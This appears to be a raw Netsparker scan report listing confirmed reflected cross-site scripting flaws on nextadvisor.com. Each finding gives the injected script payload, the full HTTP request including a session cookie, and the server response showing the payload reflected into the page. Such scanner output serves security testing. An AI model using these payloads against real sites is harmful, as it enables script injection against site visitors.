1-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog..
- /auto_insurance/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019A)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00019A)%3C/script%3E

/auto_insurance/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019A)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00019A)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/auto_insurance/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enet..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x00019A)</script>

Request

GET /auto_insurance/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019A)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/auto_insurance/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:56:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6677
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", , Geico, 21st Century, Progressive, Esurance, Hartford AARP, Allstate, The Hartford" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/auto_insurance/index.php'"--></style></script><script>netsparker(0x00019A)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x00019A)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/auto_insurance_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Auto Insurance FAQ</h1> <p>Frequently Asked Questions about Auto Insurance</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Auto Insurance:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="auto_insurance"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-..
- /credit_cards/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B0)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B0)%3C/script%3E

/credit_cards/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B0)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B0)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/credit_cards/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0001B0)</script>

Request

GET /credit_cards/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B0)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/credit_cards/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:56:52 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 8493
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", credit card, credit cards, cash rebate, gas rebates, balance transfer, student credit cards, bad credit, TrueEarnings&#174; Card from Costco and American Express, Miles by Discover&#174; Card, Discover&#174; Open Road Card, American Express&#174; Premier Rewards Gold Card, Chase Sapphire<sup><small>SM</small></sup>, Blue<sup><small>SM</small></sup> from American Express, Chase Freedom&#174; $100 Bonus Cash Back Visa, Chase Freedom&#174; $100 Bonus Cash Back MasterCard, Discover&#174; More Card, Blue Cash&#174; from American Express, Blue Sky from American Express<sup><small>SM</small></sup>, Discover&#174; Motiva Card, Discover&#174; Student Card, Slate<sup><small>SM</small></sup> with Blueprint, Discover&#174; Student Open Road Card, Public Savings Bank Open Sky Secured Visa&#174;, PrePaid Visa&#174; RushCard" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/credit_cards/'"--></style></script><script>netsparker(0x0001B0)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0001B0)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="cash_back.php">Cash Back</a><span class="nav_border">|</span><a href="travel_rewards.php">Travel</a><span class="nav_border">|</span> <a href="rewards_card.php">Rewards</a><span class="nav_border">|</span> <a href="student_card.php">Student</a><span class="nav_border">|</span> <a href="low_APR.php">Low APR</a><span class="nav_border">|</span> <a href="poor_credit.php">Poor Credit</a><span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/credit_cards_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Credit Cards FAQ</h1> <p>Frequently Asked Questions about Credit Cards</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Credit Cards:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="credit_cards"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100..
- /credit_cards/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001BC)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BC)%3C/script%3E

/credit_cards/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001BC)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BC)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/credit_cards/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsp..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0001BC)</script>

Request

GET /credit_cards/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001BC)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/credit_cards/index.php
